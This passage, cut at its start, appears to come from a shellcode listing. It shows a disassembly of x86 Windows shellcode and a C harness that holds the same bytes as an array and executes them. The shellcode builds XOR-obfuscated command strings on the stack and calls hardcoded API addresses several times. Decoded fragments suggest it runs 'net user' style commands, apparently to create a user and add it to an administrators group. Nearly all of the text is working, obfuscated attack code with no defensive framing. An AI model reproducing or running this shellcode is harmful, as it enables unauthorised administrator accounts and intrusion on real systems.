$0x6a61325d,%edx b4: 31 d1 xor %edx,%ecx b6: 51 push %ecx b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx bc: ba 68 68 72 4b mov $0x4b726868,%edx c1: 31 d1 xor %edx,%ecx c3: 51 push %ecx c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx c9: ba 5a 57 5b 52 mov $0x525b575a,%edx ce: 31 d1 xor %edx,%ecx d0: 51 push %ecx d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx d6: ba 70 4b 70 51 mov $0x51704b70,%edx db: 31 d1 xor %edx,%ecx dd: 51 push %ecx de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx e3: ba 51 45 51 2d mov $0x2d514551,%edx e8: 31 d1 xor %edx,%ecx ea: 51 push %ecx eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx f0: ba 4d 39 68 39 mov $0x3968394d,%edx f5: 31 d1 xor %edx,%ecx f7: 51 push %ecx f8: 89 e0 mov %esp,%eax fa: bb 41 41 41 01 mov $0x1414141,%ebx ff: c1 eb 08 shr $0x8,%ebx 102: c1 eb 08 shr $0x8,%ebx 105: c1 eb 08 shr $0x8,%ebx 108: 53 push %ebx 109: 50 push %eax 10a: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 10f: ba 33 52 64 59 mov $0x59645233,%edx 114: 31 d3 xor %edx,%ebx 116: ff d3 call *%ebx 118: 31 c0 xor %eax,%eax 11a: 50 push %eax 11b: 68 41 41 64 64 push $0x64644141 120: 58 pop %eax 121: c1 e8 08 shr $0x8,%eax 124: c1 e8 08 shr $0x8,%eax 127: 50 push %eax 128: b9 02 63 6b 35 mov $0x356b6302,%ecx 12d: ba 4b 43 44 54 mov $0x5444434b,%edx 132: 31 d1 xor %edx,%ecx 134: 51 push %ecx 135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx 13a: ba 43 75 2d 71 mov $0x712d7543,%edx 13f: 31 d1 xor %edx,%ecx 141: 51 push %ecx 142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx 147: ba 54 5a 49 69 mov $0x69495a54,%edx 14c: 31 d1 xor %edx,%ecx 14e: 51 push %ecx 14f: b9 25 34 12 67 mov $0x67123425,%ecx 154: ba 4a 44 32 32 mov $0x3232444a,%edx 159: 31 d1 xor %edx,%ecx 15b: 51 push %ecx 15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx 161: ba 6e 71 74 6d mov $0x6d74716e,%edx 166: 31 d1 xor %edx,%ecx 168: 51 push %ecx 169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx 16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx 173: 31 d1 xor %edx,%ecx 175: 51 push %ecx 176: b9 35 15 03 2a mov $0x2a031535,%ecx 17b: ba 67 70 6e 45 mov $0x456e7067,%edx 180: 31 d1 xor %edx,%ecx 182: 51 push %ecx 183: b9 3a 17 75 46 mov $0x4675173a,%ecx 188: ba 6f 47 55 64 mov $0x6455476f,%edx 18d: 31 d1 xor %edx,%ecx 18f: 51 push %ecx 190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx 195: ba 6a 72 59 51 mov $0x5159726a,%edx 19a: 31 d1 xor %edx,%ecx 19c: 51 push %ecx 19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx 1a2: ba 66 65 45 6b mov $0x6b456566,%edx 1a7: 31 d1 xor %edx,%ecx 1a9: 51 push %ecx 1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx 1af: ba 53 65 61 7a mov $0x7a616553,%edx 1b4: 31 d1 xor %edx,%ecx 1b6: 51 push %ecx 1b7: 89 e0 mov %esp,%eax 1b9: bb 41 41 41 01 mov $0x1414141,%ebx 1be: c1 eb 08 shr $0x8,%ebx 1c1: c1 eb 08 shr $0x8,%ebx 1c4: c1 eb 08 shr $0x8,%ebx 1c7: 53 push %ebx 1c8: 50 push %eax 1c9: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 1ce: ba 33 52 64 59 mov $0x59645233,%edx 1d3: 31 d3 xor %edx,%ebx 1d5: ff d3 call *%ebx 1d7: 31 c0 xor %eax,%eax 1d9: 50 push %eax 1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx 1df: ba 38 6c 53 38 mov $0x38536c38,%edx 1e4: 31 d1 xor %edx,%ecx 1e6: 51 push %ecx 1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx 1ec: ba 62 62 5d 34 mov $0x345d6262,%edx 1f1: 31 d1 xor %edx,%ecx 1f3: 51 push %ecx 1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx 1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx 1fe: 31 d1 xor %edx,%ecx 200: 51 push %ecx 201: b9 1d 30 15 28 mov $0x2815301d,%ecx 206: ba 58 77 4a 6c mov $0x6c4a7758,%edx 20b: 31 d1 xor %edx,%ecx 20d: 51 push %ecx 20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx 213: ba 53 5b 77 44 mov $0x44775b53,%edx 218: 31 d1 xor %edx,%ecx 21a: 51 push %ecx 21b: b9 42 25 2a 66 mov $0x662a2542,%ecx 220: ba 2d 4b 59 46 mov $0x46594b2d,%edx 225: 31 d1 xor %edx,%ecx 227: 51 push %ecx 228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx 22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx 232: 31 d1 xor %edx,%ecx 234: 51 push %ecx 235: b9 20 2b 26 26 mov $0x26262b20,%ecx 23a: ba 63 44 48 48 mov $0x48484463,%edx 23f: 31 d1 xor %edx,%ecx 241: 51 push %ecx 242: b9 08 2b 23 67 mov $0x67232b08,%ecx 247: ba 66 52 77 34 mov $0x34775266,%edx 24c: 31 d1 xor %edx,%ecx 24e: 51 push %ecx 24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx 254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx 259: 31 d1 xor %edx,%ecx 25b: 51 push %ecx 25c: b9 67 67 1d 37 mov $0x371d6767,%ecx 261: ba 45 47 32 41 mov $0x41324745,%edx 266: 31 d1 xor %edx,%ecx 268: 51 push %ecx 269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx 26e: ba 71 45 68 49 mov $0x49684571,%edx 273: 31 d1 xor %edx,%ecx 275: 51 push %ecx 276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx 27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx 280: 31 d1 xor %edx,%ecx 282: 51 push %ecx 283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx 288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx 28d: 31 d1 xor %edx,%ecx 28f: 51 push %ecx 290: b9 34 23 23 3b mov $0x3b232334,%ecx 295: ba 68 77 46 49 mov $0x49467768,%edx 29a: 31 d1 xor %edx,%ecx 29c: 51 push %ecx 29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx 2a2: ba 73 48 65 78 mov $0x78654873,%edx 2a7: 31 d1 xor %edx,%ecx 2a9: 51 push %ecx 2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx 2af: ba 48 6d 37 3d mov $0x3d376d48,%edx 2b4: 31 d1 xor %edx,%ecx 2b6: 51 push %ecx 2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx 2bc: ba 52 6e 43 46 mov $0x46436e52,%edx 2c1: 31 d1 xor %edx,%ecx 2c3: 51 push %ecx 2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx 2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx 2ce: 31 d1 xor %edx,%ecx 2d0: 51 push %ecx 2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx 2d6: ba 58 7a 44 44 mov $0x44447a58,%edx 2db: 31 d1 xor %edx,%ecx 2dd: 51 push %ecx 2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx 2e3: ba 49 62 78 52 mov $0x52786249,%edx 2e8: 31 d1 xor %edx,%ecx 2ea: 51 push %ecx 2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx 2f0: ba 61 31 67 75 mov $0x75673161,%edx 2f5: 31 d1 xor %edx,%ecx 2f7: 51 push %ecx 2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx 2fd: ba 62 64 68 73 mov $0x73686462,%edx 302: 31 d1 xor %edx,%ecx 304: 51 push %ecx 305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx 30a: ba 36 33 78 69 mov $0x69783336,%edx 30f: 31 d1 xor %edx,%ecx 311: 51 push %ecx 312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx 317: ba 31 52 4c 67 mov $0x674c5231,%edx 31c: 31 d1 xor %edx,%ecx 31e: 51 push %ecx 31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx 324: ba 58 49 79 72 mov $0x72794958,%edx 329: 31 d1 xor %edx,%ecx 32b: 51 push %ecx 32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx 331: ba 2d 65 52 6e mov $0x6e52652d,%edx 336: 31 d1 xor %edx,%ecx 338: 51 push %ecx 339: b9 16 10 1f 17 mov $0x171f1016,%ecx 33e: ba 34 58 54 52 mov $0x52545834,%edx 343: 31 d1 xor %edx,%ecx 345: 51 push %ecx 346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx 34b: ba 4e 43 68 4e mov $0x4e68434e,%edx 350: 31 d1 xor %edx,%ecx 352: 51 push %ecx 353: b9 39 22 5e 50 mov $0x505e2239,%ecx 358: ba 4b 47 39 70 mov $0x7039474b,%edx 35d: 31 d1 xor %edx,%ecx 35f: 51 push %ecx 360: 89 e0 mov %esp,%eax 362: bb 41 41 41 01 mov $0x1414141,%ebx 367: c1 eb 08 shr $0x8,%ebx 36a: c1 eb 08 shr $0x8,%ebx 36d: c1 eb 08 shr $0x8,%ebx 370: 53 push %ebx 371: 50 push %eax 372: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 377: ba 33 52 64 59 mov $0x59645233,%edx 37c: 31 d3 xor %edx,%ebx 37e: ff d3 call *%ebx 380: 31 c0 xor %eax,%eax 382: 50 push %eax 383: b8 41 41 41 65 mov $0x65414141,%eax 388: c1 e8 08 shr $0x8,%eax 38b: c1 e8 08 shr $0x8,%eax 38e: c1 e8 08 shr $0x8,%eax 391: 50 push %eax 392: b9 1e 53 39 3c mov $0x3c39531e,%ecx 397: ba 6d 32 5b 50 mov $0x505b326d,%edx 39c: 31 d1 xor %edx,%ecx 39e: 51 push %ecx 39f: b9 04 66 2f 32 mov $0x322f6604,%ecx 3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx 3a9: 31 d1 xor %edx,%ecx 3ab: 51 push %ecx 3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx 3b1: ba 69 73 62 75 mov $0x75627369,%edx 3b6: 31 d1 xor %edx,%ecx 3b8: 51 push %ecx 3b9: b9 20 41 47 36 mov $0x36474120,%ecx 3be: ba 45 35 67 59 mov $0x59673545,%edx 3c3: 31 d1 xor %edx,%ecx 3c5: 51 push %ecx 3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx 3cb: ba 47 69 44 59 mov $0x59446947,%edx 3d0: 31 d1 xor %edx,%ecx 3d2: 51 push %ecx 3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx 3d8: ba 62 5a 38 43 mov $0x43385a62,%edx 3dd: 31 d1 xor %edx,%ecx 3df: 51 push %ecx 3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx 3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx 3ea: 31 d1 xor %edx,%ecx 3ec: 51 push %ecx 3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx 3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx 3f7: 31 d1 xor %edx,%ecx 3f9: 51 push %ecx 3fa: 89 e0 mov %esp,%eax 3fc: bb 41 41 41 01 mov $0x1414141,%ebx 401: c1 eb 08 shr $0x8,%ebx 404: c1 eb 08 shr $0x8,%ebx 407: c1 eb 08 shr $0x8,%ebx 40a: 53 push %ebx 40b: 50 push %eax 40c: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 411: ba 33 52 64 59 mov $0x59645233,%edx 416: 31 d3 xor %edx,%ebx 418: ff d3 call *%ebx 41a: 31 c0 xor %eax,%eax 41c: 50 push %eax 41d: b8 41 41 41 6f mov $0x6f414141,%eax 422: c1 e8 08 shr $0x8,%eax 425: c1 e8 08 shr $0x8,%eax 428: c1 e8 08 shr $0x8,%eax 42b: 50 push %eax 42c: b9 72 2a 05 39 mov $0x39052a72,%ecx 431: ba 52 4b 70 4d mov $0x4d704b52,%edx 436: 31 d1 xor %edx,%ecx 438: 51 push %ecx 439: b9 54 3a 05 52 mov $0x52053a54,%ecx 43e: ba 35 48 71 6f mov $0x6f714835,%edx 443: 31 d1 xor %edx,%ecx 445: 51 push %ecx 446: b9 29 16 0a 47 mov $0x470a1629,%ecx 44b: ba 4c 36 79 33 mov $0x3379364c,%edx 450: 31 d1 xor %edx,%ecx 452: 51 push %ecx 453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx 458: ba 55 6d 32 5d mov $0x5d326d55,%edx 45d: 31 d1 xor %edx,%ecx 45f: 51 push %ecx 460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx 465: ba 41 77 48 75 mov $0x75487741,%edx 46a: 31 d1 xor %edx,%ecx 46c: 51 push %ecx 46d: b9 34 79 3a 12 mov $0x123a7934,%ecx 472: ba 53 59 4e 77 mov $0x774e5953,%edx 477: 31 d1 xor %edx,%ecx 479: 51 push %ecx 47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx 47f: ba 72 32 78 41 mov $0x41783272,%edx 484: 31 d1 xor %edx,%ecx 486: 51 push %ecx 487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx 48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx 491: 31 d1 xor %edx,%ecx 493: 51 push %ecx 494: 89 e0 mov %esp,%eax 496: bb 41 41 41 01 mov $0x1414141,%ebx 49b: c1 eb 08 shr $0x8,%ebx 49e: c1 eb 08 shr $0x8,%ebx 4a1: c1 eb 08 shr $0x8,%ebx 4a4: 53 push %ebx 4a5: 50 push %eax 4a6: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 4ab: ba 33 52 64 59 mov $0x59645233,%edx 4b0: 31 d3 xor %edx,%ebx 4b2: ff d3 call *%ebx 4b4: bb f9 7e 5e 22 mov $0x225e7ef9,%ebx 4b9: ba 36 54 3d 54 mov $0x543d5436,%edx 4be: 31 d3 xor %edx,%ebx 4c0: ff d3 call *%ebx */ #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\xbb\xf9\x7e\x5e\x22\xba\x36\x54\x3d\x54\x31\xd3\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }
×